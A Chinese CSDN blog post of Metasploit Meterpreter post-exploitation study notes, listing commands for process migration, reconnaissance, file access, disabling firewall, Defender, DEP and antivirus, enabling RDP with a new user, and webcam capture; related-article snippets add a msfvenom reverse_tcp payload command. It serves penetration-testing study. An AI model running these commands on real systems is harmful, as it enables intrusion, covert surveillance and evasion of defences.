msf之后渗透(笔记)

最新推荐文章于 2024-07-10 12:09:21 发布
最新推荐文章于 2024-07-10 12:09:21 发布
阅读量2.4k 收藏 23
点赞数 1
分类专栏: 后渗透内网提权 文章标签: linux shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108381939
版权

后渗透攻击:信息收集

Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。

Meterpreter优势:

 - 纯内存工作模式,不需要对磁盘进行任何写入操作
 - 使用加密通信协议,可以同时与几个信道通信
 - 在被攻击进程内工作,不需要创建新的进程
 - 易于在多进程之间迁移
 - 平台通用
  • 进程迁移
    获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到
获取目标机正在运行的进程:ps

输入getpid命令查看shell的进程号(pid),然后根据进程号对应ps命令查出来的name

查看shell的进程号:getpid

输入migrate 448命令把shell移动到pid为448的exe进程里,因为该进程是一个稳定的应用,完成进程迁移后,再次输入getpid命令查看shell的进程号

把shell进程迁移到(pid=448)的进程里:migrate 448

完成后,原先shell的进程会自动关闭,如果没有自动关闭可以输入 kill 984杀死该进程

手动关闭(pid=984)进程:kill 984

自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移

自动寻找合适的进程迁移:run post/windows/manage/migrate
  • 系统命令
    获得稳定的进程后,接下来收集系统信息

查看目标机的系统信息						sysinfo
检查目标机是否正在运行(最近的运行时间) 	idletime
查看目标机完整的网络设置					route
将当前会话放到后台						background
查看当前目标机上已经渗透成功的用户名		getuid
关闭目标机系统杀毒软件					run post/windows/manage/killav
启动远程桌面协议(3389)					run post/windows/manage/enable_rdp
查看目标机的本地子网情况					run post/windows/manage/autoroute


可以借助被攻陷的主机对其他网络进行攻击:

添加路由									route add 192.168.43.0 255.255.255.0
查看路由情况								route print
列举当前那些用户登陆目标机				run post/windows/gather/enum_logged_on_users
列举安装在目标机上的应用程序				run post/windows/gather/enum_applications
获取目标机器的分区情况					run post/windows/gather/forensics/enum_drives
检查目标机是否运行在虚拟机上				run post/windows/gather/checkvm
开启服务									run post/windows/gather/enum_services
查看共享									run post/windwos/gather/enum_shares
获取主机最近的系统操作					run	post/windows/gather/dumplinks
查看补丁									run	post/windows/gather/enum_applications



几个好玩的命令:

对远程主机当前屏幕进行截图				screenshot
查看目标机有没有摄像头					webcam_list
打开目标机摄像头拍一张照片				webcam_snap
开启直播模式								webcam_stream
进入目标机的命令模式						shell
  • 文件系统命令
    Meterpreter支持各种文件系统命令,用于搜索文件并执行各种任务

pwd或getwd:查看当前处于目标机的哪个目录
getlwd:查看当前处于本地的哪个目录
ls:列出当前目录中的所有文件
cd:切换目录
search-f*.txt-d c: \:可以搜索C盘中所有以.txt为扩展名的文件,其中-f用于指定搜索文件模式,-d用于指定在哪个目录下进行搜索
download C: \test.txt/root:下载目标机C盘的test.txt文件到攻击机root下
upload/root/test.txt C:\:上传攻击机root目录下的test.txt文件到目标机C盘下

上述可以使我们获得更多关于目标机的信息,当然还包含很多文件系统命令,需要我们去了解。

后渗透攻击:权限提升

在渗透测试的过程中很有可能只获得了一个系统的Guest或者User权限,低的权限级别使我们受到了很多的限制,在实施横向渗透或者提权攻击时很困难,在主机上如果没有管理员权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guest提升到User再到admin最后到System级别,渗透的目的是获取服务器的最高权限,也就是Windows的管理员账号或linux的root权限。

  • 提升权限的方式
纵向提权:低权限A获得高权限B的权限也称为权限升级
横向提权:获取同级别的权限,通过系统A获取了系统B的权限

后渗透攻击:关闭杀软

关闭防火墙:
netsh advfirewall set allprofiles state off
关闭Denfender:
net stop windefend
关闭DEP:
bcdedit.exe/set{current}nx alwaysoff
关闭杀毒软件:
run killav
run post/windows/manage/killava

后渗透攻击:远程连接

开启远程桌面:
run post/windows/manage/enable_rdp
run getgui -e
开启远程桌面并添加一个新用户:
run getgui -u xxx -p ean
开启远程桌面并绑定在8888端口:
run getgui -e -f 8888
截图:
load espia
screengrab

小知识

whoami/groups:查看当前的权限
p_utao
关注
专栏目录
[渗透测试笔记] 19.msf初步
H4ppyD0g的博客
05-05 571
msf利用浏览器漏洞渗透 这里利用IE6和漏洞ms10_018 原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。 msfconsole启动msf search ms10_018查看相关漏洞 use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块 set LHOST 192.168.2...
CTF内网渗透笔记
qq_26579613的博客
11-10 3949
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
MSF渗透
wo41ge的博客
11-24 3731
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
MSF(六):后渗透
1stPeak's Blog
02-21 5125
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
【内网渗透MSF渗透阶段常用操作笔记
最新发布
uuzeray的博客
07-10 814
1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users。6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。启动远程桌面协议:run post/windows/manage/enable_rdp。
MSF渗透操作
weixin_51583379的博客
11-03 1584
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
msf渗透
舞动的獾
07-19 3671
主要内容 首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 已经找到一台机器执行了我的payload 进一步获取更高的权限。 获取system权限 load priv getsystems 执行出现超时 先返回msf,保留session
渗透测试学习笔记
Tom197的博客
06-08 1429
2.子域名查询 3.NDS2IP 查询IP,可以通过ping域名方式获得。 站长之家也可以获得,得到IP更详细,通过不同服务器访问,得到大致位置。 nslookup 域名 dig 域名 dnsenum 域名 4.nmap测试 测试服务器所在局域网情况(服务器有哪些设备,开放了什么端口端口),防止一台服务器被攻陷,再延续到局域网其他服务器,nmap -sp 地址。 nmap -O 查询这一网络中每一台设备是什么系统 。AWVS ——new scan 输入网站地址,得到所有漏洞的信息,点击相应漏洞,右侧出
kaliMSF笔记
fhl5203的博客
11-01 1478
metasploit framework 基本使用 msfconsole使用接口 最流行的用户接口 几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行(系统命令等) 点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息 help / ? / help vulns MSF控制台命令 Banner、Color connect 类似nc s...
《web渗透测试实战:基于metasploit5.0》读书笔记:2.5.1 MSF入门
不念过去,不畏将来。
11-11 967
MSF控制台命令: 核心MSF控制台命令:这些命令是MSF控制台中最常用和通用的命令。 模块管理命令:使用这些命令管理MSF模块。你可以在这些命令的帮助下编辑、加载、搜索和使用Metasploit模块。 MSF作业管理命令:使用这些命令,你可以处理Metasploit模块作业操作,例如使用处理程序创建作业,列出在后台运行的作业以及取消和重命名作业。 资源脚本管理命令:使用资源脚本时,可以通过这些命令在控制台中执行脚本。你可以执行一个存储的脚本文件,也可以将MSF控制台启动时使用的命令存储到一个文件中 后台
msf渗透(Meterpreter命令)
2302_76986722的博客
09-17 503
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
MSF渗透攻击
weixin_43749601的博客
03-06 1756
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
超实用!手把手教你如何用MSF进行后渗透测试!
dianyan5615的博客
06-15 1084
  在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患。   本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进...
MSF渗透模块Meterpreter
LainWith的博客
01-27 4367
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 2820
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
MSF渗透权限维持
轻舟已过万重山
09-25 643
MSF渗透阶段,创建后门用户,权限维持,后门维持的学习。
Msf渗透测试阶段
分享学习网络的点点滴滴
01-09 421
● 已经获得目标系统控制权后扩大战果○ 提权○ 信息收集○ 渗透内网○ 永久后门● 基于已有session扩大战果。
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
weixin_51803729的博客
02-12 5276
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
msf渗透linux
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试时,可以使用不同的模块和命令来实现不同的目标。比如,可以使用 "exploit/multi/mysql/mysql_udf_payload" 模块来执行针对 MySQL 数据库的攻击,并利用已知的漏洞进行远程执行代码的操作。 运行 "run" 命令来执行该模块。同样地,可以使用 "exploit(windows/http/manageengine_connectionid_write)" 模块来针对 ManageEngine 连接标识写入漏洞进行攻击,并通过 "run" 命令来执行该模块。 除了执行攻击模块外,还可以使用 "set" 命令来设置模块的参数。例如,可以使用 "exploit(multi/mysql/mysql_udf_payload)" 模块并通过 "set username root" 命令将用户名设置为 "root"。 需要注意的是,MSF 是一个强大的工具,应该在合法和授权的环境中使用。在进行任何渗透测试活动之前,请确保已经获得了适当的授权和许可,并遵守法律和道德准则。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值